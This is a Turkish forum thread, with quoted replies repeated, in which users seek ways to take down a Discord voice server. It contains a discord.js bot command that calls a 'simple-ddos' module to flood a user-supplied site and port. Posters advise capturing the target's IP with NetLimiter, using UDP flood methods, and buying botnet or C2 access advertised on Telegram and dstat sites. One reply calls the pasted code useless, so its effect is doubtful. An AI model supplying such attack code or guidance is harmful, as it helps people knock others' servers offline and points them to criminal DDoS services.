kanka kodlama bilgim hic yok kolay yoldan halledebilecegimiz bi yol yok mu veya nasıl ogrenirimBazı siteler veya c sharp kodları var onlarla yapılıyo da bende pek bilmiyo amaa ornek 1992.920.2311 < odanın hat sunucu ip si bu ip ye belirli kodlarla yaparsın diye düşünüyorum
DÜZENLEME: kanka item satış da bi ddos atma yeri buldum ama paralı güvenilir değil istersen atarım link ddos atma ücreti 20 tl miş
düzenleme kod buldum
Discord DDOS Atma Komutu
Açıklama;
Belirttiğiniz siteye ddos atar!
Atılacağı Yer;
komutlar/ddos-at.js
Eklenilcek Modüller;
simple-ddos
Kod:
const Discord = require ("discord.js");
const ddos = require ("simple-ddos");
exports.run = (client, message, args) => {
/* Emojiler Burada İdi */
let başarılı = client.emojis.get("649321643704975384");
let yükleniyor = client.emojis.get("649322537804890132");
let başarısız = client.emojis.get("650954036387905536");
/* Argslar */
var site = args.slice(0).join(" ");
var port = args.slice(1).join(" ");
/* Hatalar&Yardım Menü */
if (!site) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** `);
if (!port) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** ` );
/* İşlev */
message.channel.send( ` ${yükleniyor} **Saldırı İçin Botnetler Hazırlanıyor...**`).then ;
message.channel.send( ` ${başarılı} **Saldırı Başlatıldı**` )
ddos(30,`${site}`, 200, 1000 )
};
exports.conf = {
enabled: true,
aliases: [],
permLevel: 0
};
exports.help = {
name: 'ddos',
description: 'İstediğiniz Siteye DDoS Saldırısı Yapar',
usage: '!ddos <Site w/Http(s)> <port>'
};
NetLimitter'dan alıcaksın aypiyi çakıcaksın UDPMİX bak bakıyım allahuteala hazretlerinin huzuruna gitmiyormu o sunucu.
botnet veya c2 alıcaksın discord methodu olan sonra netlimiterdan odanın ipsini cekip vurucaksın
ddos toolun varsa vurursunLinkleri görebilmek için kayıt olmanız gerekmektedir
burdan hangisini alacağım?
birde ddos toolu ile vurmamız mümkün mü?
66. ile başlayanlar, birde ddos tool ile vuramazsın discord methodu olan botnet veya c2 kullanman gerek, özel payload kullanılıyor, Amerika lokasyon ses sunucuları methodla bile düşmüyorlar amaLinkleri görebilmek için kayıt olmanız gerekmektedir
burdan hangisini alacağım?
birde ddos toolu ile vurmamız mümkün mü?
hiçbirşey yapmaz buBazı siteler veya c sharp kodları var onlarla yapılıyo da bende pek bilmiyo amaa ornek 1992.920.2311 < odanın hat sunucu ip si bu ip ye belirli kodlarla yaparsın diye düşünüyorum
DÜZENLEME: kanka item satış da bi ddos atma yeri buldum ama paralı güvenilir değil istersen atarım link ddos atma ücreti 20 tl miş
düzenleme kod buldum
Discord DDOS Atma Komutu
Açıklama;
Belirttiğiniz siteye ddos atar!
Atılacağı Yer;
komutlar/ddos-at.js
Eklenilcek Modüller;
simple-ddos
Kod:
const Discord = require ("discord.js");
const ddos = require ("simple-ddos");
exports.run = (client, message, args) => {
/* Emojiler Burada İdi */
let başarılı = client.emojis.get("649321643704975384");
let yükleniyor = client.emojis.get("649322537804890132");
let başarısız = client.emojis.get("650954036387905536");
/* Argslar */
var site = args.slice(0).join(" ");
var port = args.slice(1).join(" ");
/* Hatalar&Yardım Menü */
if (!site) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** `);
if (!port) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** ` );
/* İşlev */
message.channel.send( ` ${yükleniyor} **Saldırı İçin Botnetler Hazırlanıyor...**`).then ;
message.channel.send( ` ${başarılı} **Saldırı Başlatıldı**` )
ddos(30,`${site}`, 200, 1000 )
};
exports.conf = {
enabled: true,
aliases: [],
permLevel: 0
};
exports.help = {
name: 'ddos',
description: 'İstediğiniz Siteye DDoS Saldırısı Yapar',
usage: '!ddos <Site w/Http(s)> <port>'
};
NetLimitter'dan alıcaksın aypiyi çakıcaksın UDPMİX bak bakıyım allahuteala hazretlerinin huzuruna gitmiyormu o sunucu.
bu methodlu botnet veya c2 dediğiniz şeyi nerden bulabilirim? satılıyor mu veya bildiğin bir yer var mı?66. ile başlayanlar, birde ddos tool ile vuramazsın discord methodu olan botnet veya c2 kullanman gerek, özel payload kullanılıyor, Amerika lokasyon ses sunucuları methodla bile düşmüyorlar ama
hiçbirşey yapmaz bu
telegramda dstat, botnet kanallarında vs. çok fazla reklamlarını yapıyorlar ama dikkatli ol sc4mmer fazla var ddos piyasasındabu methodlu botnet veya c2 dediğiniz şeyi nerden bulabilirim? satılıyor mu veya bildiğin bir yer var mı?
buradan paylaşmam uygun olmaz, telegramda botnet ve C2 servisleri aratarak veya googlede dstat sitelerinde reklamlar veriliyor C2 sıralaması oluyor onlara bakabilirsinbu methodlu botnet veya c2 dediğiniz şeyi nerden bulabilirim? satılıyor mu veya bildiğin bir yer var mı?